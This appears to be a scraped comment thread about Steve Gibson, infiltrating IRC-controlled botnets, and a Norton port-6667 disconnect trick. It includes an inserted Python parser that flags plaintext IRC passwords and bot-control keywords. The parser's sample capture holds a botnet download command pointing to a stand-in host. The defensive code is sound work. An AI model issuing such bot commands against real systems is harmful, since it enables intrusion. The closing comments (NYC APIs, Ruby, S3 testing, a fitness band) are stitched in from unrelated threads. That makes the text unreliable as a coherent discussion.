
Anybody notice the table of contents and page numbers?


The Steve Gibson story was really interesting. He's a really cool guy, too. My botnet adventures happened around the same time as his, and I too was DDoS'd. We even exchanged a few e-mails about botnets and the script kiddie culture. Those were fun times.


Except when he went on record opposing the addition of raw-sockets to Windows XP saying it would help hackers and spell the end of the world. I remember clutching my Redhat CD, just in case raw sockets were banned ;-)

http://www.theregister.co.uk/2001/06/25/steve_gibson_really_...


And then you know they banned them with a nonremovable patch, right? http://seclists.org/nmap-hackers/2005/4


Who cares about XP? I was fearing legislation because his cry of wolf was heard far and wide.


Ah, yeah, I remember that too now :)


When I was a teenager I found it fun to intentionally infect myself with malware and try to study it. I now realize this wasn't the most responsible thing to do, as I wasn't in a sandboxed environment, but it was a great learning experience and taught me a lot about networking and security.

One of the biggest malwares I ever managed to infect myself with was a bot, which caused my computer to become a zombie on a ~10K botnet. I spent hours running a packet sniffer and seeing how the client interacted with the IRC network it called home to. Upon connecting to the privately run IRC network, the bot would authenticate with a user and pass. I assume it created one upon connecting to the network for the first time. My best guess as to why this is, is so that the bot master could track the total number of zombies and compare it to how many were actively connected to the botnet. Kind of a clever way to get metrics, now that I think about it.

When I temporarily stopped the bot from connecting to IRC, I decided it might be fun to login as the bot and join the channel I saw it connecting to. Upon joining the channel, I saw thousands of other users on the channel. I spent a couple of days sitting there, masquerading myself as a bot, and watching the botmaster interact with the bots. The botmaster would issue commands that I can't really recall anymore, but I do remember seeing a lot of commands that I assumed told the bots to download extra malware from a remote host. I remember seeing URLs for zip and exe files.

Eventually I got a little bored of this, so I decided to message the botmaster. It was easy to spot him; out of the three ops on the channel, he was the only full op. I tried a "hello" and waited. And waited. And then I was k-lined from the IRC network.

The next day when I logged onto my computer, I found my Internet connectivity was being overwhelmed with bogus TCP requests. I had pissed off the botmaster by snooping, and now I was getting DDoS'd. I imagine he/she commandeered a small number of the bots to do this. It wouldn't take many... I imagine back then, given my bandwidth, 10-15 would have done it.

Fun times. I remember posting about my botnet adventures to Security Focus way back when. Some people got really interested and followed my posts, while other professionals asked me to stop because I wasn't running a sandbox.

IMO, those were different times. I'm not sure I'd recommend something like this these days. After hearing about certain botnets being tied to various mafias and gangs around the world (which is probably more common than you think. See http://www.ibtimes.co.uk/articles/321149/20120329/mafia-cont...), I'm not sure I'd really want to risk interfering with their activities.


It's funny you should say this. I practically did the same thing, from a different perspective.

I ran my own little IRC server when I was a teenager, and one day I noticed a lot of my friends were being disconnected from the server. After some more investigation, it seemed like they were actually being disconnected completely from the Internet. Bit odd.

Upon more investigation, I found an acquaintance had something like 10,000 bots (spybot/rxbot) going through my server (yes, a simple /list could have sufficed...), and when I looked at the topic of his channels, I noticed they consisted primarily of commands to control the botnet. "startkeylogger" sort of thing.

A few more pokes and I realised it was Norton Antivirus that was listening on port 6667 for any "bad" commands, and then disconnecting the user from the internet. I thought this was hilarious, and went to Efnet, tried it in a large channel and watched 400 people disconnect. Then I felt quite bad, so I emailed Norton, and received no reply.

Something like two years later, I noticed the same exploit on the main page of Slashdot, and chaos ensued. It did make me feel pretty cool, "ha! I knew something before all you big uber leet haxxors!" :]

Sadly, my acquaintance didn't mature like the rest of us and decided to use his knowledge and skills to do naughty things, and the FBI got him. Good riddance.


That's a neat variation on the old PING +++ATH0 trick.


NO CARRIER


If you can and want to, would you mind elaborating on your acquaintance? I'm intrigued by what he did and how he got caught :-)


> I tried a "hello" and waited. And waited. And then I was k-lined from the IRC network. The next day when I logged onto my computer, I found my Internet connectivity was being overwhelmed with bogus TCP requests.

I'd probably do the same, upon discovering that one of my bots had become sentient.


Exactly what I would have done. DC'ed and headed for the closest bunker.


I do think the appropriate course of action is to /nick SkyNet and start shouting killAllHumans


I'm sure. I'm not exactly surprised that it happened now ;)


This is fantastic. I did the same with a very similar botnet way back when, except my "hello" in IRC wasn't as friendly. Left to eat for an hour, then came back to my hard drive erased. Live and learn...


Thanks! I agree that things like this are pretty fantastic. Part of me misses those days of being so experimental and new to tech. Sorry to hear about your hard drive, though :)


Perhaps a rather naive question, but: were the username and pw transferred in plaintext?


Think of the username and password as a tracking cookie, more than actual authentication.


Yep, I remember both being sent via plaintext.


RFC 1459 Internet Relay Chat[1] clearly shows in its example that it uses plaintext passwords:

  Example:
    PASS secretpasswordhere

It also explains how the server password can be set either globally or per client.

[1] http://tools.ietf.org/html/rfc1459#section-4.1.1
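As an added example (mine, not from this thread or the RFC), here is a small RFC 1459 line parser run over a constructed capture; it flags the plaintext PASS credential the comment above points out, and the bot-control keywords in channel topics that the earlier Norton/port 6667 comment describes. The capture, the keyword list and the hostnames are all made up for illustration.

```python
"""Parse RFC 1459 IRC messages from a captured session and flag plaintext
PASS credentials and bot-control keywords in channel topics (defender's view)."""
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed watch list; "startkeylogger" is the keyword mentioned in the thread.
SUSPICIOUS_TOPIC_WORDS = ("startkeylogger", ".download")


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str] = field(default_factory=list)


def parse_irc_line(line: str) -> IrcMessage:
    """Split one line into prefix, command and params (RFC 1459 section 2.3.1).
    The trailing parameter, introduced by ' :', may itself contain spaces."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    command, params = parts[0].upper(), parts[1:]
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, command, params)


def audit_session(lines) -> List[tuple]:
    """Return (finding-kind, detail) pairs for a captured client/server session."""
    findings = []
    for raw in lines:
        if not raw.strip():
            continue
        msg = parse_irc_line(raw)
        if msg.command == "PASS" and msg.params:
            findings.append(("plaintext-password", msg.params[0]))
        elif msg.command in ("TOPIC", "332") and msg.params:  # 332 = RPL_TOPIC
            topic = msg.params[-1].lower()
            hits = [w for w in SUSPICIOUS_TOPIC_WORDS if w in topic]
            if hits:
                findings.append(("bot-control-topic", ", ".join(hits)))
    return findings


# Constructed sample capture (not real traffic): a bot logging in to its channel.
SAMPLE_CAPTURE = [
    "PASS s3cretbotpass",
    "NICK bot-1234",
    "USER bot 0 * :bot",
    ":irc.example.invalid 332 bot-1234 #ctrl :startkeylogger .download http://example.invalid/u.zip",
    ":op!u@h PRIVMSG #ctrl :hello",
]

if __name__ == "__main__":
    for kind, detail in audit_session(SAMPLE_CAPTURE):
        print(f"{kind}: {detail}")
```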


Interesting, but when I ran into a similar backdoor on a client's server (it had been infected through a phpbb upload script), I found the password to the IRC server in clear text by using either hexdump or strings. Not sure which of the tools, but I also tried connecting and found a channel with just around 20-30 bots at the most. Fun experience just like yours.


This reminds me of the push here in NYC for all of the city agencies to open their data via an API. It's gotten better over time, but when the initiative first took flight, it was terrible. Some of the APIs flat out did not work, and the ones that did often returned all sorts of malformed, non-normalized data. It was a nightmare to work with. I'm curious if the government can do better.


Ahem. That's "phreaking"... As in phone phreaking. -- coming from an ex-phone phreak ;)


Unless he's talking about the first Apple computer, in which case, they were literally building "freaking boxes."


Interesting. I wonder, though, what the advantages of executing sandboxed ruby in the browser are?


This would let you write Chrome extensions in Ruby (rather than JS).


You could already do that by compiling Ruby with Emscripten, there is nothing new here.


Porting a rails application to run serverless.


To my knowledge, this vulnerability is anything but new. It's been around for years.


Why not just change the storage strategy to saving files locally while in your test environment? Fog lets you do this easily with its configuration options.


I can only imagine this is specific to scenarios where you have to manipulate s3 objects directly and the fog::storage abstraction used for s3 isn't adequate (though I could not give an example of such a scenario specifically).


This is wonderful. I love the feel of the interface.


If I hadn't just got a Nike Fuel band, I'd probably get one of those! Don't think I could pull off wearing both.

